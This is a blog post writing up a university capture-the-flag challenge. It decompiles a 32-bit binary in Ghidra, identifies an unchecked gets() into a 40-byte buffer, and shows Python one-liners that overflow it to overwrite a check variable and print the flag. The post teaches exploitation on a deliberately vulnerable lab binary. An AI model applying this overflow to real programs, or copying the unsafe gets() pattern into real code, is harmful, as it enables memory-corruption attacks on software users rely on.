<!DOCTYPE html>







<html lang="en"
  
>

  <!--
  The Head
-->

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

    <!-- i18n for `_javascript/utils/timeago.js` -->
    <meta name="day-prompt" content="days ago">
    <meta name="hour-prompt" content="hours ago">
    <meta name="minute-prompt" content="minutes ago">
    <meta name="justnow-prompt" content="just now">

    

    

  

  <!-- Begin Jekyll SEO tag v2.7.1 -->
<meta name="generator" content="Jekyll v4.2.1" />
<meta property="og:title" content="KCSC - A simple BOF" />
<meta name="author" content="The Archivist" />
<meta property="og:locale" content="en" />
<meta name="description" content="Today we are going to test out Ghidra with one of my university pwnie challenge." />
<meta property="og:description" content="Today we are going to test out Ghidra with one of my university pwnie challenge." />
<link rel="canonical" href="https://legiahuyy.github.io/blog/en/posts/ez-bof/" />
<meta property="og:url" content="https://legiahuyy.github.io/blog/en/posts/ez-bof/" />
<meta property="og:site_name" content="Another infosec blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-02-24T03:45:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="KCSC - A simple BOF" />
<meta name="twitter:site" content="@0x7c00" />
<meta name="twitter:creator" content="@The Archivist" />
<meta name="google-site-verification" content="google_meta_tag_verification" />
<script type="application/ld+json">
{"@type":"BlogPosting","headline":"KCSC - A simple BOF","url":"https://legiahuyy.github.io/blog/en/posts/ez-bof/","dateModified":"2021-05-15T16:19:36+08:00","datePublished":"2021-02-24T03:45:00+08:00","author":{"@type":"Person","name":"The Archivist"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://legiahuyy.github.io/blog/en/posts/ez-bof/"},"description":"Today we are going to test out Ghidra with one of my university pwnie challenge.","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <title>KCSC - A simple BOF | Another infosec blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/blog/en/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/blog/en/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/blog/en/assets/img/favicons/favicon-16x16.png">
<link rel="manifest" href="/blog/en/assets/img/favicons/site.webmanifest">
<link rel="shortcut icon" href="/blog/en/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Another infosec blog">
<meta name="application-name" content="Another infosec blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/blog/en/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous">
  <link rel="dns-prefetch" href="https://fonts.gstatic.com">

  <!-- GA -->
  

  <!-- jsDelivr CDN -->
  <link rel="preconnect" href="https://cdn.jsdelivr.net">
  <link rel="dns-prefetch" href="https://cdn.jsdelivr.net">

  <!-- Bootstrap -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css">

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css">

  <!--
  CSS selector for site.
-->

<link rel="stylesheet" href="/blog/en/assets/css/style.css">


  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css">



  <!-- Manific Popup -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css">



  <!-- JavaScript -->

  <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>

</head>


  
    <!--
  Switch the mode between dark and light.
-->

<script type="text/javascript">
  class ModeToggle {
    static get MODE_KEY() { return "mode"; }
    static get DARK_MODE() { return "dark"; }
    static get LIGHT_MODE() { return "light"; }
    static get ID() { return "mode-toggle"; }

    constructor() {
      if (this.hasMode) {
        if (this.isDarkMode) {
          if (!this.isSysDarkPrefer) {
            this.setDark();
          }
        } else {
          if (this.isSysDarkPrefer) {
            this.setLight();
          }
        }
      }

      let self = this;

      /* always follow the system prefers */
      this.sysDarkPrefers.addEventListener("change", () => {
        if (self.hasMode) {
          if (self.isDarkMode) {
            if (!self.isSysDarkPrefer) {
              self.setDark();
            }

          } else {
            if (self.isSysDarkPrefer) {
              self.setLight();
            }
          }

          self.clearMode();
        }

        self.notify();

      });

    } /* constructor() */

    get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); }

    get isSysDarkPrefer() { return this.sysDarkPrefers.matches; }

    get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; }

    get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; }

    get hasMode() { return this.mode != null; }

    get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); }

    /* get the current mode on screen */
    get modeStatus() {
      if (this.isDarkMode
        || (!this.hasMode && this.isSysDarkPrefer)) {
        return ModeToggle.DARK_MODE;
      } else {
        return ModeToggle.LIGHT_MODE;
      }
    }

    setDark() {
      $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE);
    }

    setLight() {
      $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
      sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE);
    }

    clearMode() {
      $('html').removeAttr(ModeToggle.MODE_KEY);
      sessionStorage.removeItem(ModeToggle.MODE_KEY);
    }

    /* Notify another plugins that the theme mode has changed */
    notify() {
      window.postMessage({
        direction: ModeToggle.ID,
        message: this.modeStatus
      }, "*");
    }

  } /* ModeToggle */

  const toggle = new ModeToggle();

  function flipMode() {
    if (toggle.hasMode) {
      if (toggle.isSysDarkPrefer) {
        if (toggle.isLightMode) {
          toggle.clearMode();
        } else {
          toggle.setLight();
        }

      } else {
        if (toggle.isDarkMode) {
          toggle.clearMode();
        } else {
          toggle.setDark();
        }
      }

    } else {
      if (toggle.isSysDarkPrefer) {
        toggle.setLight();
      } else {
        toggle.setDark();
      }
    }

    toggle.notify();

  } /* flipMode() */

</script>

  

  <body data-spy="scroll" data-target="#toc">

    <!--
  The Side Bar
-->

<div id="sidebar" class="d-flex flex-column align-items-end" lang="en">
  <div class="profile-wrapper text-center">
    <div id="avatar">
      <a href="/blog/en/" alt="avatar" class="mx-auto">
        
          
          <img src="/blog/en/assets/img/avatar.gif" alt="avatar" onerror="this.style.display='none'">
        
      </a>
    </div>

    <div class="site-title mt-3">
      <a href="/blog/en/">Another infosec blog</a>
    </div>
    <div class="site-subtitle font-italic">Where one's enthusiasm provides knowledge and comprehension for others.</div>

  </div><!-- .profile-wrapper -->

  <ul class="w-100">

    <!-- home -->
    <li class="nav-item">
      <a href="/blog/en/" class="nav-link">
        <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i>
        <span>HOME</span>
      </a>
    </li>
    <!-- the real tabs -->
    
    <li class="nav-item">
      <a href="/blog/en/categories/" class="nav-link">
        <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>CATEGORIES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/blog/en/tags/" class="nav-link">
        <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>TAGS</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/blog/en/archives/" class="nav-link">
        <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ARCHIVES</span>
      </a>
    </li> <!-- .nav-item -->
    
    <li class="nav-item">
      <a href="/blog/en/about/" class="nav-link">
        <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i>
        

        <span>ABOUT</span>
      </a>
    </li> <!-- .nav-item -->
    

  </ul> <!-- ul.nav.flex-column -->

  <div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center">

    
      <button class="mode-toggle btn" aria-label="Switch Mode">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
      <a href="https://github.com/legiahuyy" aria-label="github"
        target="_blank" rel="noopener">
        <i class="fab fa-github"></i>
      </a>
      

    
      

      
      <a href="https://twitter.com/0x7c00" aria-label="twitter"
        target="_blank" rel="noopener">
        <i class="fab fa-twitter"></i>
      </a>
      

    
      

      
      <a href="
          javascript:location.href = 'mailto:' + ['legiahuy420','gmail.com'].join('@')" aria-label="email"
        >
        <i class="fas fa-envelope"></i>
      </a>
      

    
      

      
      <a href="/blog/en/feed.xml" aria-label="rss"
        >
        <i class="fas fa-rss"></i>
      </a>
      

    

  </div> <!-- .sidebar-bottom -->

</div><!-- #sidebar -->


    <!--
  The Top Bar
-->

<div id="topbar-wrapper" class="row justify-content-center topbar-down">
  <div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between">
    <span id="breadcrumb">

    

    

      

        
          <span>
            <a href="/blog/en/">
              Home
            </a>
          </span>

        

      

        

      

        

          
            <span>KCSC - A simple BOF</span>
          

        

      

    

    </span><!-- endof #breadcrumb -->

    <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i>

    <div id="topbar-title">
      Post
    </div>

    <i id="search-trigger" class="fas fa-search fa-fw"></i>
    <span id="search-wrapper" class="align-items-center">
      <i class="fas fa-search fa-fw"></i>
      <input class="form-control" id="search-input" type="search"
        aria-label="search" autocomplete="off" placeholder="Search...">
      <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i>
    </span>
    <span id="search-cancel" >Cancel</span>
  </div>

</div>


    <div id="main-wrapper">
      <div id="main">

        



<div class="row">

  <!-- core -->
  <div id="core-wrapper" class="col-12 col-lg-11 col-xl-8">
    <div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">
    
      
        <!--
  Refactor the HTML structure.
-->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Add attribute 'hide-bullet' to the checkbox list -->




<!-- images -->



<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      

      

    
      

      
      

      
      

      

    

    

  

  
  

  

  
  

  

  
  

  




<!-- return -->







<h1 data-toc-skip>KCSC - A simple BOF</h1>

<div class="post-meta text-muted">

  <!-- author -->
  <div>
    
    

    

    
    <em>
      
        <a href="https://twitter.com/0x7c00">The Archivist</a>
      
    </em>
  </div>

  <div class="d-flex">
    <div>
      <!-- published date -->
      <span>
        
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago"
    date="2021-02-24 03:45:00 +0800"
    
      data-toggle="tooltip"
      data-placement="bottom"
      title="Wed, Feb 24, 2021,  3:45 AM +0800"
    >Feb 24</em>

      </span>

      <!-- lastmod date -->
      
      <span>
        Updated
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago"
    date="2021-05-15 15:19:36 +0700
"
    
      data-toggle="tooltip"
      data-placement="bottom"
      title="Sat, May 15, 2021,  3:19 PM +0700"
    >May 15</em>

      </span>
      

      <!-- read time -->
      <!--
  Calculate the post's reading time, and display the word count in tooltip
 -->



<!-- words per minute  -->










<!-- return element -->
<span class="readtime" data-toggle="tooltip" data-placement="bottom"
  title="416 words">
  <em>2 min</em> read</span>


      <!-- page views -->
      
    </div>

  </div> <!-- .d-flex -->

</div> <!-- .post-meta -->

<div class="post-content">
  <p>Today we are going to test out Ghidra with one of my university pwnie challenge.</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Info</th>
      <th>Value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Name</td>
      <td>pwn1</td>
    </tr>
    <tr>
      <td>SHA256</td>
      <td>d3e77076e7c9c113e22d08ff1e266aad4070625fb9841f49451dc835b09bd799d243e24a064ba3e8b0f10d86f5d10b381942f6902343d614ee5cf401c4138fd3</td>
    </tr>
    <tr>
      <td>Type</td>
      <td>ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0</td>
    </tr>
    <tr>
      <td>Entropy</td>
      <td>3.82492 (not packed)</td>
    </tr>
  </tbody>
</table></div>

<h2 id="analyzing">Analyzing<a href="#analyzing"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>Let’s load the binary into our disassembler Ghidra and analyze the main function. Take your time to spot the problem in the following code.</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span label-text="C"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
</pre></td><td class="rouge-code"><pre><span class="n">undefined4</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>

<span class="p">{</span>
  <span class="n">__uid_t</span> <span class="n">__euid</span><span class="p">;</span>
  <span class="n">__uid_t</span> <span class="n">__ruid</span><span class="p">;</span>
  <span class="kt">char</span> <span class="n">local_4c</span> <span class="p">[</span><span class="mi">40</span><span class="p">];</span>
  <span class="kt">int</span> <span class="n">local_24</span><span class="p">;</span>
  <span class="n">undefined</span> <span class="o">*</span><span class="n">local_14</span><span class="p">;</span>
  
  <span class="n">local_14</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">stack0x00000004</span><span class="p">;</span>
  <span class="n">local_24</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="n">setbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">);</span>
  <span class="n">setbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">);</span>
  <span class="n">setbuf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">);</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">"This should be an easy BOF!"</span><span class="p">);</span>
  <span class="n">gets</span><span class="p">(</span><span class="n">local_4c</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">local_24</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">"try again ma boi :v"</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="k">else</span> <span class="p">{</span>
    <span class="n">puts</span><span class="p">(</span><span class="s">"Good, now try harder"</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">local_24</span> <span class="o">==</span> <span class="mh">0xbabebeef</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">__euid</span> <span class="o">=</span> <span class="n">geteuid</span><span class="p">();</span>
      <span class="n">__ruid</span> <span class="o">=</span> <span class="n">geteuid</span><span class="p">();</span>
      <span class="n">setreuid</span><span class="p">(</span><span class="n">__ruid</span><span class="p">,</span><span class="n">__euid</span><span class="p">);</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"OK, submit the flag"</span><span class="p">);</span>
      <span class="n">system</span><span class="p">(</span><span class="s">"cat flag"</span><span class="p">);</span>
    <span class="p">}</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<h2 id="breakdown">Breakdown<a href="#breakdown"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>We can see the variable <code class="language-plaintext highlighter-rouge">local_24</code> is declared but never changed and thus the program’s flow will always result into <code class="language-plaintext highlighter-rouge">if (local_24 == 0)</code> statement, <em>right?</em> That’s when the buffer overflow jumps in as the <code class="language-plaintext highlighter-rouge">gets</code> is marked as deprecated and not safe to use.</p>

<blockquote>
  <p>MSDN:</p>

  <p>Because there is no way to limit the number of characters read by gets, untrusted input can easily cause buffer overruns. Use <code class="language-plaintext highlighter-rouge">fgets</code> instead.</p>
</blockquote>

<p>As the explanation is said, that it’s impossible to tell how many characters <code class="language-plaintext highlighter-rouge">gets</code> will read into the buffer, here is <code class="language-plaintext highlighter-rouge">local_4c</code> with the length of 40 in character. Let’s try overflow it with a simple python script.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/CTF/KCSC/ez_bof]
└─<span class="nv">$ </span>python3 <span class="nt">-c</span> <span class="s2">"print('a'*41)"</span> | ./pwn1
This should be an easy BOF!
Good, now try harder
</pre></td></tr></tbody></table></code></div></div>

<p>Great, we are able to get through the first block. In the next conditional statement, we can achieve the flag whether the comparison between <code class="language-plaintext highlighter-rouge">local_24</code> and <code class="language-plaintext highlighter-rouge">0xbabebeef</code> is equal. We can just simply modify the <code class="language-plaintext highlighter-rouge">local_24</code> value to <code class="language-plaintext highlighter-rouge">0xbabebeef</code>.</p>

<p>As we have known that the buffer is holding 40 characters in size, the leftover ones are being passed onto the next stack address which is now <code class="language-plaintext highlighter-rouge">local_24</code>’s address. So we will fill the buffer <code class="language-plaintext highlighter-rouge">local_4c</code> with 40 characters and then put <code class="language-plaintext highlighter-rouge">0xbabebeef</code> value into <code class="language-plaintext highlighter-rouge">local_24</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span label-text="Shell"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/CTF/KCSC/ez_bof]
└─<span class="nv">$ </span>python3 <span class="nt">-c</span> <span class="s2">"print('a'*40 + '</span><span class="se">\x</span><span class="s2">ef</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">ba')"</span> | ./pwn1
This should be an easy BOF!
Good, now try harder
OK, submit the flag
KCSC<span class="o">{[</span>REDACTED]<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

</div>

<div class="post-tail-wrapper text-muted">

  <!-- categories -->
  

  <!-- tags -->
  
  <div class="post-tags">
    <i class="fa fa-tags fa-fw mr-1"></i>
      
      <a href="/blog/en/tags/kma/"
          class="post-tag no-text-decoration" >kma</a>
      
      <a href="/blog/en/tags/reverse-engineer/"
          class="post-tag no-text-decoration" >reverse engineer</a>
      
      <a href="/blog/en/tags/pwn/"
          class="post-tag no-text-decoration" >pwn</a>
      
  </div>
  

  <div class="post-tail-bottom
    d-flex justify-content-between align-items-center mt-3 pt-5 pb-2">
    <div class="license-wrapper">

      

        

        This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.

      
    </div>

    <!--
 Post sharing snippet
-->

<div class="share-wrapper">
  <span class="share-label text-muted mr-1">Share</span>
  <span class="share-icons">
    
    

    
      
        <a href="https://twitter.com/intent/tweet?text=KCSC - A simple BOF - Another infosec blog&url=https://legiahuyy.github.io/blog/en/posts/ez-bof/" data-toggle="tooltip" data-placement="top"
          title="Twitter" target="_blank" rel="noopener" aria-label="Twitter">
          <i class="fa-fw fab fa-twitter"></i>
        </a>
    
      
        <a href="https://www.facebook.com/sharer/sharer.php?title=KCSC - A simple BOF - Another infosec blog&u=https://legiahuyy.github.io/blog/en/posts/ez-bof/" data-toggle="tooltip" data-placement="top"
          title="Facebook" target="_blank" rel="noopener" aria-label="Facebook">
          <i class="fa-fw fab fa-facebook-square"></i>
        </a>
    
      
        <a href="https://telegram.me/share?text=KCSC - A simple BOF - Another infosec blog&url=https://legiahuyy.github.io/blog/en/posts/ez-bof/" data-toggle="tooltip" data-placement="top"
          title="Telegram" target="_blank" rel="noopener" aria-label="Telegram">
          <i class="fa-fw fab fa-telegram"></i>
        </a>
    

    <i id="copy-link" class="fa-fw fas fa-link small"
        data-toggle="tooltip" data-placement="top"
        title="Copy link"
        title-succeed="Link copied successfully!">
    </i>

  </span>
</div>


  </div><!-- .post-tail-bottom -->

</div><!-- div.post-tail-wrapper -->


      
    
    </div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down">

    <div class="access">
      















  <div id="access-lastmod" class="post">
    <div class="panel-heading">Recent Update</div>
    <ul class="post-content pl-0 pb-1 ml-1 mt-2">
      
        
        
        
      <li><a href="/blog/en/posts/pwns-1/">PWN Journey - Part 1</a></li>
      
        
        
        
      <li><a href="/blog/en/posts/HTB-BountyHunter/">HackTheBox - BountyHunter</a></li>
      
        
        
        
      <li><a href="/blog/en/posts/HTB-Cap/">HackTheBox - Cap</a></li>
      
        
        
        
      <li><a href="/blog/en/posts/PRE-C1-E1/">PRE Solutions Series: First Chapter</a></li>
      
        
        
        
      <li><a href="/blog/en/posts/Update-Note/">Update.txt</a></li>
      
    </ul>
  </div> <!-- #access-lastmod -->



      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <div id="access-tags">
    <div class="panel-heading">Trending Tags</div>
    <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

    
      
      <a class="post-tag" href="/blog/en/tags/pwn/">pwn</a>
    
      
      <a class="post-tag" href="/blog/en/tags/hackthebox/">hackthebox</a>
    
      
      <a class="post-tag" href="/blog/en/tags/network/">network</a>
    
      
      <a class="post-tag" href="/blog/en/tags/reverse-engineer/">reverse engineer</a>
    
      
      <a class="post-tag" href="/blog/en/tags/kma/">kma</a>
    
      
      <a class="post-tag" href="/blog/en/tags/machine/">machine</a>
    
      
      <a class="post-tag" href="/blog/en/tags/content/">content</a>
    
      
      <a class="post-tag" href="/blog/en/tags/miscs/">miscs</a>
    
      
      <a class="post-tag" href="/blog/en/tags/on-going/">On-going</a>
    
      
      <a class="post-tag" href="/blog/en/tags/practical-reverse-engineering/">Practical Reverse Engineering</a>
    

    </div>
  </div>


    </div>

    
      
      



<!-- BS-toc.js will be loaded at medium priority -->
<script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div>


    
  </div>

</div>

<!-- tail -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">
      
        
        <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  
    
  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->






  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/blog/en/posts/pwns-1/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago small"
    date="2021-12-08 00:00:00 +0800"
    >Dec  8</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>PWN Journey - Part 1</h3>
            <div class="text-muted small">
              <p>
                





                Foreword

Greetings, this series of posts delves into a collection of pwnie solutions that I have been poking around for a while and finally have the time to publish it so that I could practice my ...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/blog/en/posts/RFI-Wrapper/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago small"
    date="2021-02-24 03:45:00 +0800"
    >Feb 24</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>KCSC - LFI/RFI Wrapper</h3>
            <div class="text-muted small">
              <p>
                





                This is the first iteration of my CTF write-up series for the new year. Today we will be solving one of my university’s initial challenges. The task is simple itself but I want to show you the mind...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/blog/en/posts/HTB-Sharp/">
          <div class="card-body">
            <!--
  Date format snippet
  See: ${JS_ROOT}/utils/timeago.js
-->





<em class="timeago small"
    date="2021-05-16 03:45:00 +0800"
    >May 16</em>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Sharp</h3>
            <div class="text-muted small">
              <p>
                





                Hi, after a long time not posting anything on this blog because of my university workload. Let’s get back to our normal routine of pwning. Today, I will do a writeup of retired HackTheBox (HTB) mac...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->


      
        
        <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/blog/en/posts/RFI-Wrapper/" class="btn btn-outline-primary"
    prompt="Older">
    <p>KCSC - LFI/RFI Wrapper</p>
  </a>
  

  
  <a href="/blog/en/posts/HTB-Sharp/" class="btn btn-outline-primary"
    prompt="Newer">
    <p>HackTheBox - Sharp</p>
  </a>
  

</div>

      
        
        <!--
  The Disqus lazy loading.
-->



      
    </div>
  </div>
</div> <!-- .row -->



        <!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center text-muted">
    <div class="footer-left">
      <p class="mb-0">
        © 2021
        <a href="https://twitter.com/0x7c00">The Archivist</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Most rights reserved.</span>
        
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        

        

        Powered by Github Pages and Jekyll.

      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
